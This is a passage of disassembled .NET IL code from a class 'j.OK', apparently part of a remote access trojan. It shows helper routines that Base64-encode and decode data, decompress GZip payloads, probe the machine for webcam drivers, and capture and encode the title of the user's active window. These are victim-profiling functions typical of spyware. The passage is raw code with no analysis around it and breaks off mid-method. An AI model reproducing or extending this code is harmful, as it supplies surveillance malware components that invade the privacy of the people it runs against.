IL_0385: stloc.2
IL_0386: ldloc.s V_17
IL_0388: ldc.i4.1
IL_0389: add.ovf
IL_038a: stloc.s V_17
IL_038c: ldloc.s V_17
IL_038e: ldloc.s V_18
IL_0390: ldlen
IL_0391: conv.ovf.i4
IL_0392: blt.s IL_0366
IL_0394: leave.s IL_03a5
} // end .try
catch [mscorlib]System.Exception
{
IL_0396: dup
IL_0397: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(class [mscorlib]System.Exception)
IL_039c: stloc.s V_12
IL_039e: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
IL_03a3: leave.s IL_03a5
} // end handler
IL_03a5: ldloc.1
IL_03a6: ldloc.2
IL_03a7: call string [mscorlib]System.String::Concat(string,
string)
IL_03ac: ret
} // end of method OK::inf
.method public static string ENB(string& s) cil managed
{
// Code size 12 (0xc)
.maxstack 1
.locals init (string V_0)
IL_0000: ldarg.0
IL_0001: call uint8[] j.OK::SB(string&)
IL_0006: call string [mscorlib]System.Convert::ToBase64String(uint8[])
IL_000b: ret
} // end of method OK::ENB
.method public static string DEB(string& s) cil managed
{
// Code size 16 (0x10)
.maxstack 1
.locals init (string V_0,
uint8[] V_1)
IL_0000: ldarg.0
IL_0001: ldind.ref
IL_0002: call uint8[] [mscorlib]System.Convert::FromBase64String(string)
IL_0007: stloc.1
IL_0008: ldloca.s V_1
IL_000a: call string j.OK::BS(uint8[]&)
IL_000f: ret
} // end of method OK::DEB
.method public static uint8[] SB(string& S) cil managed
{
// Code size 13 (0xd)
.maxstack 2
.locals init (uint8[] V_0)
IL_0000: call class [mscorlib]System.Text.Encoding [mscorlib]System.Text.Encoding::get_UTF8()
IL_0005: ldarg.0
IL_0006: ldind.ref
IL_0007: callvirt instance uint8[] [mscorlib]System.Text.Encoding::GetBytes(string)
IL_000c: ret
} // end of method OK::SB
.method public static string BS(uint8[]& B) cil managed
{
// Code size 13 (0xd)
.maxstack 2
.locals init (string V_0)
IL_0000: call class [mscorlib]System.Text.Encoding [mscorlib]System.Text.Encoding::get_UTF8()
IL_0005: ldarg.0
IL_0006: ldind.ref
IL_0007: callvirt instance string [mscorlib]System.Text.Encoding::GetString(uint8[])
IL_000c: ret
} // end of method OK::BS
.method public static uint8[] ZIP(uint8[] B) cil managed
{
// Code size 101 (0x65)
.maxstack 4
.locals init (uint8[] V_0,
uint8[] V_1,
class [System]System.IO.Compression.GZipStream V_2,
class [mscorlib]System.IO.MemoryStream V_3,
int32 V_4,
uint8[] V_5)
IL_0000: ldarg.0
IL_0001: newobj instance void [mscorlib]System.IO.MemoryStream::.ctor(uint8[])
IL_0006: stloc.3
IL_0007: ldloc.3
IL_0008: ldc.i4.0
IL_0009: newobj instance void [System]System.IO.Compression.GZipStream::.ctor(class [mscorlib]System.IO.Stream,
valuetype [System]System.IO.Compression.CompressionMode)
IL_000e: stloc.2
IL_000f: ldc.i4.4
IL_0010: newarr [mscorlib]System.Byte
IL_0015: stloc.1
IL_0016: ldloc.3
IL_0017: ldloc.3
IL_0018: callvirt instance int64 [mscorlib]System.IO.MemoryStream::get_Length()
IL_001d: ldc.i4.5
IL_001e: conv.i8
IL_001f: sub.ovf
IL_0020: callvirt instance void [mscorlib]System.IO.MemoryStream::set_Position(int64)
IL_0025: ldloc.3
IL_0026: ldloc.1
IL_0027: ldc.i4.0
IL_0028: ldc.i4.4
IL_0029: callvirt instance int32 [mscorlib]System.IO.MemoryStream::Read(uint8[],
int32,
int32)
IL_002e: pop
IL_002f: ldloc.1
IL_0030: ldc.i4.0
IL_0031: call int32 [mscorlib]System.BitConverter::ToInt32(uint8[],
int32)
IL_0036: stloc.s V_4
IL_0038: ldloc.3
IL_0039: ldc.i4.0
IL_003a: conv.i8
IL_003b: callvirt instance void [mscorlib]System.IO.MemoryStream::set_Position(int64)
IL_0040: ldloc.s V_4
IL_0042: ldc.i4.1
IL_0043: sub.ovf
IL_0044: ldc.i4.1
IL_0045: add.ovf
IL_0046: newarr [mscorlib]System.Byte
IL_004b: stloc.0
IL_004c: ldloc.2
IL_004d: ldloc.0
IL_004e: ldc.i4.0
IL_004f: ldloc.s V_4
IL_0051: callvirt instance int32 [System]System.IO.Compression.GZipStream::Read(uint8[],
int32,
int32)
IL_0056: pop
IL_0057: ldloc.2
IL_0058: callvirt instance void [mscorlib]System.IO.Stream::Dispose()
IL_005d: ldloc.3
IL_005e: callvirt instance void [mscorlib]System.IO.Stream::Dispose()
IL_0063: ldloc.0
IL_0064: ret
} // end of method OK::ZIP
.method public static bool Cam() cil managed
{
// Code size 62 (0x3e)
.maxstack 5
.locals init (bool V_0,
int32 V_1,
class [mscorlib]System.Exception V_2,
string V_3,
string V_4)
.try
{
IL_0000: ldc.i4.0
IL_0001: stloc.1
IL_0002: ldloc.1
IL_0003: conv.ovf.i2
IL_0004: ldc.i4.s 100
IL_0006: call string [Microsoft.VisualBasic]Microsoft.VisualBasic.Strings::Space(int32)
IL_000b: stloc.3
IL_000c: ldloca.s V_3
IL_000e: ldc.i4.s 100
IL_0010: ldnull
IL_0011: stloc.s V_4
IL_0013: ldloca.s V_4
IL_0015: ldc.i4.s 100
IL_0017: call bool j.OK::capGetDriverDescriptionA(int16,
string&,
int32,
string&,
int32)
IL_001c: brfalse.s IL_0022
IL_001e: ldc.i4.1
IL_001f: stloc.0
IL_0020: leave.s IL_003c
IL_0022: ldloc.1
IL_0023: ldc.i4.1
IL_0024: add.ovf
IL_0025: stloc.1
IL_0026: ldloc.1
IL_0027: ldc.i4.4
IL_0028: ble.s IL_0002
IL_002a: leave.s IL_003a
} // end .try
catch [mscorlib]System.Exception
{
IL_002c: dup
IL_002d: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(class [mscorlib]System.Exception)
IL_0032: stloc.2
IL_0033: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
IL_0038: leave.s IL_003a
} // end handler
IL_003a: ldc.i4.0
IL_003b: ret
IL_003c: ldloc.0
IL_003d: ret
} // end of method OK::Cam
.method public static string ACT() cil managed
{
// Code size 93 (0x5d)
.maxstack 3
.locals init (string V_0,
native int V_1,
string V_2,
class [mscorlib]System.Exception V_3)
.try
{
IL_0000: call native int j.OK::GetForegroundWindow()
IL_0005: stloc.1
IL_0006: ldloc.1
IL_0007: ldsfld native int [mscorlib]System.IntPtr::Zero
IL_000c: call bool [mscorlib]System.IntPtr::op_Equality(native int,
native int)
IL_0011: brfalse.s IL_001b
IL_0013: ldstr ""
IL_0018: stloc.0
IL_0019: leave.s IL_005b
IL_001b: ldloc.1
IL_001c: call int64 [mscorlib]System.IntPtr::op_Explicit(native int)
IL_0021: call int32 j.OK::GetWindowTextLength(int64)
IL_0026: ldc.i4.1
IL_0027: add.ovf
IL_0028: call string [Microsoft.VisualBasic]Microsoft.VisualBasic.Strings::Space(int32)
IL_002d: stloc.2
IL_002e: ldloc.1
IL_002f: ldloca.s V_2
IL_0031: ldloc.2
IL_0032: callvirt instance int32 [mscorlib]System.String::get_Length()
IL_0037: call int32 j.OK::GetWindowText(native int,
string&,
int32)
IL_003c: pop
IL_003d: ldloca.s V_2
IL_003f: call string j.OK::ENB(string&)
IL_0044: stloc.0
IL_0045: leave.s IL_005b
} // end .try
catch [mscorlib]System.Exception
{
IL_0047: dup
IL_0048: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(class [mscorlib]System.Exception)
IL_004d: stloc.3
IL_004e: ldstr ""
IL_0053: stloc.0
IL_0054: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
IL_0059: leave.s IL_005b
} // end handler
IL_005b: ldloc.0
IL_005c: ret
} // end of method OK::ACT
.method public static string HWD() cil managed
{
// Code size 84 (0x54)
.maxstack 8
.locals init (string V_0,